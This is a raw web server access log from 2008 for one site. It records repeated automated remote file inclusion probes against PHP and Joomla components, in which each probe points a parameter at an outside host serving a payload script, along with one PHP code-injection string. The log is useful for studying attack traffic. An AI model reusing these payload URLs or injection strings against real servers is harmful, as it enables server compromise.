222.237.78.125 - - [24/Jun/2008:11:14:10 -0700] "GET /logs/access_080329.log/12all/admin/cron_pop.php?adm_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.198.149.178 - - [24/Jun/2008:11:14:33 -0700] "GET /logs//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.ffmundomaya.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [24/Jun/2008:11:14:33 -0700] "GET //path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.ffmundomaya.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.181.105.117 - - [24/Jun/2008:11:14:33 -0700] "GET /logs/contenido.php?sec=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [24/Jun/2008:11:14:34 -0700] "GET /contenido.php?sec=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.198.149.178 - - [24/Jun/2008:11:14:35 -0700] "GET /logs//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.ffmundomaya.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [24/Jun/2008:11:14:35 -0700] "GET //path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.ffmundomaya.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.30.160.11 - - [24/Jun/2008:11:15:07 -0700] "GET /logs/access_080117.log//components/com_forum/download.php?phpbb_root_path=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.30.160.11 - - [24/Jun/2008:11:15:07 -0700] "GET //components/com_forum/download.php?phpbb_root_path=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.30.160.11 - - [24/Jun/2008:11:15:07 -0700] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.78.110.72 - - [24/Jun/2008:11:15:13 -0700] "GET /logs/access_080118.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://skill-station.net/help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.78.110.72 - - [24/Jun/2008:11:15:14 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://skill-station.net/help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.78.110.72 - - [24/Jun/2008:11:15:15 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://skill-station.net/help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.12.53.176 - - [24/Jun/2008:11:15:24 -0700] "GET /logs//spaw/config/spaw_control.config.php?spaw_root=http://nicosahputra.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
195.12.53.176 - - [24/Jun/2008:11:15:24 -0700] "GET //spaw/config/spaw_control.config.php?spaw_root=http://nicosahputra.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
87.118.118.156 - - [24/Jun/2008:11:15:46 -0700] "GET /logs/errors.php?error=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.118.118.156 - - [24/Jun/2008:11:15:47 -0700] "GET /errors.php?error=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.203.122.236 - - [24/Jun/2008:11:15:50 -0700] "GET /logs/access.log//oneadmin/config.php?path[docroot]=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.234.109 - - [24/Jun/2008:11:15:53 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lust24.ch/forum/acp/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.19.170.91 - - [24/Jun/2008:11:16:10 -0700] "GET /logs/access_080117.log HTTP/1.0" 200 262144 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
89.19.170.91 - - [24/Jun/2008:11:16:13 -0700] "GET /logs/access_080117.log HTTP/1.0" 200 670488 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
202.181.105.117 - - [24/Jun/2008:11:16:27 -0700] "GET /logs/access.log/index.php?ort=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.55.68.38 - - [24/Jun/2008:11:16:28 -0700] "GET /logs/errors.php?error=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.55.68.38 - - [24/Jun/2008:11:16:28 -0700] "GET /errors.php?error=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.73.67 - - [24/Jun/2008:11:16:32 -0700] "GET /errors.php?error=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.67.26.187 - - [24/Jun/2008:11:16:32 -0700] "GET /send_reminders.php?includedir=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.55.68.38 - - [24/Jun/2008:11:16:33 -0700] "GET /logs/errors.php?error=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.181.105.117 - - [24/Jun/2008:11:16:33 -0700] "GET /logs/index.php?ort=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.55.68.38 - - [24/Jun/2008:11:16:33 -0700] "GET /errors.php?error=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.89.31.213 - - [24/Jun/2008:11:16:34 -0700] "GET /logs/access_080118.log/classes/core/language.php?rootdir=http://www.dichotomy.com.au/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.213 - - [24/Jun/2008:11:16:34 -0700] "GET /classes/core/language.php?rootdir=http://www.dichotomy.com.au/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.213 - - [24/Jun/2008:11:16:34 -0700] "GET /logs/classes/core/language.php?rootdir=http://www.dichotomy.com.au/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
195.12.53.176 - - [24/Jun/2008:11:16:37 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://www.geocities.com/siskagita/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
202.181.105.117 - - [24/Jun/2008:11:16:48 -0700] "GET /index.php?ort=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 500 374 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.234.109 - - [24/Jun/2008:11:16:58 -0700] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lust24.ch/forum/acp/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.15.234.109 - - [24/Jun/2008:11:16:58 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lust24.ch/forum/acp/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.15.234.109 - - [24/Jun/2008:11:16:58 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lust24.ch/forum/acp/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
79.170.90.64 - - [24/Jun/2008:11:17:05 -0700] "GET /logs/access_080215.log/index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://gotvdata.com/main/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
79.170.90.64 - - [24/Jun/2008:11:17:11 -0700] "GET /logs/index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://gotvdata.com/main/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
79.170.90.64 - - [24/Jun/2008:11:17:26 -0700] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://gotvdata.com/main/images/wing.jpg?? HTTP/1.1" 500 374 "-" "libwww-perl/5.810" "www.dmulk.com"
202.181.105.117 - - [24/Jun/2008:11:17:28 -0700] "GET /logs/access_080225.log/index2.php?x=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [24/Jun/2008:11:17:28 -0700] "GET /index2.php?x=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [24/Jun/2008:11:17:29 -0700] "GET /logs/index2.php?x=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.214.192.29 - - [24/Jun/2008:11:17:56 -0700] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lust24.ch/forum/acp/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.214.192.29 - - [24/Jun/2008:11:17:56 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lust24.ch/forum/acp/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.214.192.29 - - [24/Jun/2008:11:17:57 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lust24.ch/forum/acp/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.234.109 - - [24/Jun/2008:11:17:59 -0700] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lust24.ch/forum/acp/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [24/Jun/2008:11:18:00 -0700] "GET /logs/access_080123.log//includes/functions_portal.php?phpbb_root_path=http://www.dichotomy.com.au/tmp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.181.105.117 - - [24/Jun/2008:11:18:06 -0700] "GET /logs/access_080131.log/main.php?pagina=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [24/Jun/2008:11:18:06 -0700] "GET /main.php?pagina=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [24/Jun/2008:11:18:06 -0700] "GET /logs/main.php?pagina=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.18.153.2 - - [24/Jun/2008:11:18:09 -0700] "GET /logs/pub08_comments.phphttp://death32.com/mc??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.18.153.2 - - [24/Jun/2008:11:18:09 -0700] "GET /pub08_comments.phphttp://death32.com/mc??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.12.53.176 - - [24/Jun/2008:11:18:09 -0700] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.geocities.com/distovario/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
195.12.53.176 - - [24/Jun/2008:11:18:09 -0700] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.geocities.com/distovario/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
209.62.115.202 - - [24/Jun/2008:11:18:13 -0700] "GET //ktmlpro/includes/ktedit/toolbar.php?http://www.wauze.de//language/lang_english/RuLeZ/me.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
209.62.115.202 - - [24/Jun/2008:11:18:14 -0700] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?http://www.wauze.de//language/lang_english/RuLeZ/me.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
218.239.223.69 - - [24/Jun/2008:11:18:18 -0700] "GET /logs/access_080123.log//includes/functions_portal.php?phpbb_root_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.186.154 - - [24/Jun/2008:11:18:19 -0700] "GET /logs/access_080215.log/index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.18.153.2 - - [24/Jun/2008:11:18:20 -0700] "GET /logs/access_071218.log/pub08_comments.phphttp://death32.com/mc??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.18.153.2 - - [24/Jun/2008:11:18:20 -0700] "GET /pub08_comments.phphttp://death32.com/mc??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.18.153.2 - - [24/Jun/2008:11:18:21 -0700] "GET /logs/pub08_comments.phphttp://death32.com/mc??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.18.153.2 - - [24/Jun/2008:11:18:21 -0700] "GET /logs/access.log/pub08_comments.phphttp://death32.com/mc??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.186.154 - - [24/Jun/2008:11:18:24 -0700] "GET /logs/index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
88.214.192.29 - - [24/Jun/2008:11:18:30 -0700] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lust24.ch/forum/acp/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.181.105.117 - - [24/Jun/2008:11:18:33 -0700] "GET /logs/access_080211.log/index.php?configFile=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.62.115.202 - - [24/Jun/2008:11:18:34 -0700] "GET /logs//poll/png.php?include_path=http://www.wauze.de//language/lang_english/RuLeZ/me.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
209.62.115.202 - - [24/Jun/2008:11:18:34 -0700] "GET //poll/png.php?include_path=http://www.wauze.de//language/lang_english/RuLeZ/me.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
202.181.105.117 - - [24/Jun/2008:11:18:38 -0700] "GET /logs/index.php?configFile=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
205.234.186.154 - - [24/Jun/2008:11:18:40 -0700] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 500 374 "-" "libwww-perl/5.810" "www.dmulk.com"
207.114.88.90 - - [24/Jun/2008:11:18:40 -0700] "GET /logs/access_080127.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.114.88.90 - - [24/Jun/2008:11:18:40 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.114.88.90 - - [24/Jun/2008:11:18:40 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.106.202.240 - - [24/Jun/2008:11:18:50 -0700] "GET /logs/access.log/errors.php?error=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.106.202.240 - - [24/Jun/2008:11:18:50 -0700] "GET /errors.php?error=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.106.202.240 - - [24/Jun/2008:11:18:50 -0700] "GET /logs/errors.php?error=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.57.1.181 - - [24/Jun/2008:11:18:51 -0700] "GET /logs/access_080103.log//modules/xfsection/modify.php?dir_module=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.181.105.117 - - [24/Jun/2008:11:18:53 -0700] "GET /index.php?configFile=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 500 374 "-" "libwww-perl/5.65" "www.dmulk.com"
194.30.160.11 - - [24/Jun/2008:11:19:03 -0700] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.30.160.11 - - [24/Jun/2008:11:19:03 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.30.160.11 - - [24/Jun/2008:11:19:03 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.181.105.117 - - [24/Jun/2008:11:19:14 -0700] "GET /logs/access_080213.log/index.php?configFile=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.55.137.141 - - [24/Jun/2008:11:19:23 -0700] "GET /logs/access_080101.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
61.70.204.99 - - [24/Jun/2008:11:19:26 -0700] "GET /logs//cyberfolio/portfolio/msg/view.php?av=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.55.137.141 - - [24/Jun/2008:11:19:26 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.137.141 - - [24/Jun/2008:11:19:26 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
61.70.204.99 - - [24/Jun/2008:11:19:26 -0700] "GET //cyberfolio/portfolio/msg/view.php?av=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.252.3.200 - - [24/Jun/2008:11:19:30 -0700] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://4wdnews.com.au/files/id.txt?? HTTP/1.1" 500 374 "-" "libwww-perl/5.803" "www.dmulk.com"
72.55.137.141 - - [24/Jun/2008:11:19:43 -0700] "GET /logs/access_080101.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.137.141 - - [24/Jun/2008:11:19:44 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.137.141 - - [24/Jun/2008:11:19:44 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
194.30.160.11 - - [24/Jun/2008:11:19:50 -0700] "GET /logs/access_080312.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.18.153.2 - - [24/Jun/2008:11:20:04 -0700] "GET /pub08_comments.phphttp://death32.com/mc??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.137.141 - - [24/Jun/2008:11:20:04 -0700] "GET /logs/access_080104.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.114.88.90 - - [24/Jun/2008:11:20:06 -0700] "GET /logs/access_080110.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.62.115.202 - - [24/Jun/2008:11:20:08 -0700] "GET /logs///?custompluginfile%5B%5D=http://www.wauze.de//language/lang_english/RuLeZ/me.txt?? HTTP/1.1" 200 53282 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
194.30.160.11 - - [24/Jun/2008:11:20:09 -0700] "GET /logs/access_080121.log//components/com_forum/download.php?phpbb_root_path=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.62.115.202 - - [24/Jun/2008:11:20:16 -0700] "GET //pixlie.php?root=http://www.wauze.de//language/lang_english/RuLeZ/me.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
209.62.115.202 - - [24/Jun/2008:11:20:16 -0700] "GET /logs//pixlie.php?root=http://www.wauze.de//language/lang_english/RuLeZ/me.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
72.55.137.141 - - [24/Jun/2008:11:20:25 -0700] "GET /logs/access_080104.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.62.115.202 - - [24/Jun/2008:11:20:27 -0700] "GET ///?custompluginfile%5B%5D=http://www.wauze.de//language/lang_english/RuLeZ/me.txt?? HTTP/1.1" 500 374 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
203.78.110.72 - - [24/Jun/2008:11:20:29 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://skill-station.net/help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.9.129.201 - - [24/Jun/2008:11:20:31 -0700] "GET /logs/access_080220.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.friendsofnarconon.org/modules/is/Osryid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.9.129.201 - - [24/Jun/2008:11:20:31 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.friendsofnarconon.org/modules/is/Osryid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.78.110.72 - - [24/Jun/2008:11:20:32 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://skill-station.net/help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.9.129.201 - - [24/Jun/2008:11:20:42 -0700] "GET /logs/access_080220.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.friendsofnarconon.org/modules/is/Osryid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.9.129.201 - - [24/Jun/2008:11:20:43 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.friendsofnarconon.org/modules/is/Osryid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.214.192.29 - - [24/Jun/2008:11:20:50 -0700] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lust24.ch/forum/acp/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.73.161 - - [24/Jun/2008:11:20:50 -0700] "GET /megumi/minamigrad2k8/IMG_1668.CR2 HTTP/1.1" 200 8837051 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
217.9.129.201 - - [24/Jun/2008:11:20:51 -0700] "GET /logs/access_080312.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.friendsofnarconon.org/modules/is/Osryid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.214.192.29 - - [24/Jun/2008:11:20:53 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lust24.ch/forum/acp/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.214.192.29 - - [24/Jun/2008:11:20:53 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lust24.ch/forum/acp/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.9.129.201 - - [24/Jun/2008:11:21:00 -0700] "GET /logs/access_080312.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.friendsofnarconon.org/modules/is/Osryid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.178.146 - - [24/Jun/2008:11:21:15 -0700] "GET /logs/send_reminders.php?includedir=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.178.146 - - [24/Jun/2008:11:21:15 -0700] "GET /send_reminders.php?includedir=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.115.202 - - [24/Jun/2008:11:21:18 -0700] "GET //sources/template.php?CONFIG[main_path]=http://www.wauze.de//language/lang_english/RuLeZ/me.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
